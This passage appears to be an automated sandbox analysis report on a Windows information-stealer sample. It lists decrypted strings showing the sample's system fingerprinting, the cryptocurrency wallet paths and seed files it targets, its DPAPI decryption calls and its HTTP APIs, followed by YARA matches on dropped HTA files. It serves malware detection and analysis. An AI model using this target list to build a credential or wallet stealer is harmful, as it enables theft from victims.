                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: .zip
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: .zip
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Tag:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Tag:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: IP: IP?
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: IP: IP?
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Country: Country?
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Country: Country?
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Working Path:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Working Path:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Local Time:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Local Time:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: TimeZone:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: TimeZone:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Display Language:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Display Language:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Keyboard Languages:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Keyboard Languages:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Is Laptop:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Is Laptop:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Processor:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Processor:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Installed RAM:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Installed RAM:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: OS:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: OS:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: (
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: (
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Bit)
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Bit)
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Videocard:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Videocard:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Display Resolution:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Display Resolution:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: PC name:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: PC name:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: User name:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: User name:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Domain name:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Domain name:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: MachineID:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: MachineID:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GUID:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GUID:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Installed Software:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Installed Software:
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: system.txt
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: system.txt
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Grabber\%s.zip
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Grabber\%s.zip
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %APPDATA%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %APPDATA%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %USERPROFILE%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %USERPROFILE%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %DESKTOP%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: %DESKTOP%
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Ethereum
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Ethereum
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Ethereum\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Ethereum\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: keystore
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: keystore
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Electrum
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Electrum
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Electrum\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Electrum\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *.*
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *.*
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ElectrumLTC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ElectrumLTC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Electrum-LTC\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Electrum-LTC\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Exodus
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Exodus
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Exodus\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Exodus\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: exodus.conf.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: exodus.conf.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: window-state.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: window-state.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Exodus\exodus.wallet\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Exodus\exodus.wallet\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: passphrase.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: passphrase.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: seed.seco
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: seed.seco
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: info.seco
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: info.seco
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ElectronCash
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ElectronCash
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \ElectronCash\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \ElectronCash\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: default_wallet
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: default_wallet
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: MultiDoge
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: MultiDoge
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \MultiDoge\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \MultiDoge\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: multidoge.wallet
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: multidoge.wallet
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: JAXX
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: JAXX
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \jaxx\Local Storage\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \jaxx\Local Storage\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: file__0.localstorage
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: file__0.localstorage
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Atomic
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Atomic
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \atomic\Local Storage\leveldb\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \atomic\Local Storage\leveldb\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: 000003.log
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: 000003.log
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CURRENT
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CURRENT
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LOCK
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LOCK
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LOG
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LOG
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: MANIFEST-000001
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: MANIFEST-000001
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: 0000*
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: 0000*
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Binance
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Binance
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Binance\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Binance\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: app-store.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: app-store.json
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Coinomi
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Coinomi
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Coinomi\Coinomi\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: \Coinomi\Coinomi\wallets\
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *.wallet
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *.wallet
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *.config
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *.config
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *wallet*.dat
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: *wallet*.dat
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: lstrcatA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: lstrcatA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SystemTimeToFileTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SystemTimeToFileTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ntdll.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ntdll.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: sscanf
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: sscanf
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: memset
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: memset
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: memcpy
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: memcpy
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: wininet.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: wininet.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: user32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: user32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: gdi32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: gdi32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: netapi32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: netapi32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: psapi.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: psapi.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: bcrypt.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: bcrypt.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: vaultcli.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: vaultcli.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: shlwapi.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: shlwapi.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: shell32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: shell32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: gdiplus.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: gdiplus.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ole32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ole32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: dbghelp.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: dbghelp.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: WriteFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: WriteFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CloseHandle
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CloseHandle
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetFileSize
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetFileSize
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: lstrlenA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: lstrlenA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LocalAlloc
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LocalAlloc
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GlobalFree
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GlobalFree
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ReadFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ReadFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: OpenProcess
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: OpenProcess
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SetFilePointer
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SetFilePointer
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SetEndOfFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SetEndOfFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentProcessId
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentProcessId
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetLocalTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetLocalTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetTimeZoneInformation
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetTimeZoneInformation
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetUserDefaultLocaleName
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetUserDefaultLocaleName
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LocalFree
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LocalFree
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemPowerStatus
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemPowerStatus
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemInfo
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemInfo
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GlobalMemoryStatusEx
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GlobalMemoryStatusEx
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: IsWow64Process
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: IsWow64Process
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetTempPathA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetTempPathA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetLocaleInfoA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetLocaleInfoA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetFileSizeEx
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetFileSizeEx
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetFileAttributesA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetFileAttributesA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FindFirstFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FindFirstFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FindNextFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FindNextFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FindClose
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FindClose
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentDirectoryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentDirectoryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CopyFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CopyFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: DeleteFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: DeleteFileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: lstrcmpW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: lstrcmpW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GlobalAlloc
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GlobalAlloc
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FreeLibrary
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: FreeLibrary
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: SetCurrentDirectoryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetCurrentDirectoryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: MapViewOfFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: UnmapViewOfFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: FileTimeToSystemTime
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileInformationByHandle
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalLock
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalSize
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: WideCharToMultiByte
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVolumeInformationA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVersionExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiByteToWideChar
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateThread
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpyA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpynA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetConnectA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpOpenRequestA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpSendRequestA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpQueryInfoA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCloseHandle
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetReadFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetSetOptionA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenUrlA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCrackUrlA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: wsprintfA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CharToOemW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReleaseDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemMetrics
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDesktopWindow
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowRect
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseWindow
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegOpenKeyExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegQueryValueExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegCloseKey
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentHwProfileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegEnumKeyExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegGetValueA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDCA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDeviceCaps
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleDC
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree, 17_2_00408E30
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 17_2_00408D90
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA, 17_2_00405450
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 17_2_004090C0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00408AB0 CryptUnprotectData, 17_2_00408AB0

                                      Phishing

                                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, type: DROPPED
                                      Source: Yara match File source: C:\Temp\J9hHfTRUK.hta, type: DROPPED
                                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta, type: DROPPED

                                      Compliance

                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Unpacked PE file: 17.2.m0wsoI3.exe.60900000.1.unpack
                                      Source: M6gQuZPvgY.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599541837.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600168948.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb!! source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1589374900.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdb source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591172756.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588949427.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
